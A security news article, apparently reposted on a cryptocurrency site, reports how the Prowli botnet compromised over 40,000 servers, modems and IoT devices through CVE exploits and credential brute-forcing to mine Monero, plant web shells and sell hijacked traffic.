Saturday, 23 March 2019

Prowli Malware Operation Infected Over 40,000 Servers, Modems, and IoT Devices

Cyber-criminals have managed to assemble a gigantic botnet of over 40,000 infected web servers, modems, and other IoT devices, which they used for cryptocurrency mining, and for redirecting users to malicious sites.
Named Prowli and discovered by the GuardiCore security team, this botnet is a diverse operation that relies on vulnerabilities and credentials brute-force attacks to infect and take over devices.

How the Prowli group infects victims

The following types of servers and devices have known to be infected by the Prowli group in recent months:

- WordPress sites (via several exploits and admin panel brute-force attacks)
- Joomla! sites running the K2 extension (via CVE-2018-7482)
- Several models of DSL modems (via a well-known vulnerability)
- Servers running HP Data Protector (via CVE-2014-2623)
- Drupal, PhpMyAdmin installations, NFS boxes, and servers with exposed SMB ports (all via brute-force credentials guessing)

Furthermore, the Prowli group also operates an SSH scanner module that attempts to guess the username and password of devices that expose their SSH port on the Internet.

Crooks deploy cryptocurrency miner, backdoor, SSH scanner

Once servers or IoT devices have been compromised, the Prowli group determines if they can be used for heavy cryptocurrency mining operations.

Those that can are infected with a Monero miner and the r2r2 worm, a malware strain that performs SSH brute-force attacks from the hacked devices, and helps the Prowli botnet expand with new victims.

Furthermore, CMS platforms that are used to run websites receive special treatment, because they are also infected with a backdoor (the WSO Web Shell).

Crook used this web shell to modify the compromised websites to host malicious code that redirects some of the site's visitors to a traffic distribution system (TDS), which then rents out the hijacked web traffic to other crooks and redirects users to all sorts of malicious sites, such as tech support scams, fake update sites, and more.

According to GuardiCore, the TDS system crooks worked with was EITest, also known as ROI777. That service has been taken down by cyber-security firms in April after ROI777 was hacked in March and some of its data dumped online. Nonetheless, this doesn't seem to have stopped Prowli, which continued to operate onwards.

A money-making machine

The big picture, according to researchers, is that the entire Prowli operation was intentionally designed and optimized to maximize profits for crooks.

During its lifetime Prowli malware infected over 40,000 servers and devices located on the networks of over 9,000 companies, which it then used to their full potential to earn money before their malware was discovered. Prowli operated without discrimination and made victims all over the world, and regardless of the underlying platform.

The GuardiCore report on the Prowli group contains indicators of compromise and other details that system administrators can utilize to determine if their IT network has been compromised by this threat.

Legal disclaimer: The insight, recommendations and analysis presented here are based on corporate filings, current events, interviews, corporate press releases, and what we've learned as financial journalists. They are presented for the purposes of general information only, and all the information belongs to the original publishers. These may contain errors and we make no promises as to the accuracy or usefulness of the information we present. You should not make any investment decision based solely on what you read here.

Creamcoin Marketcap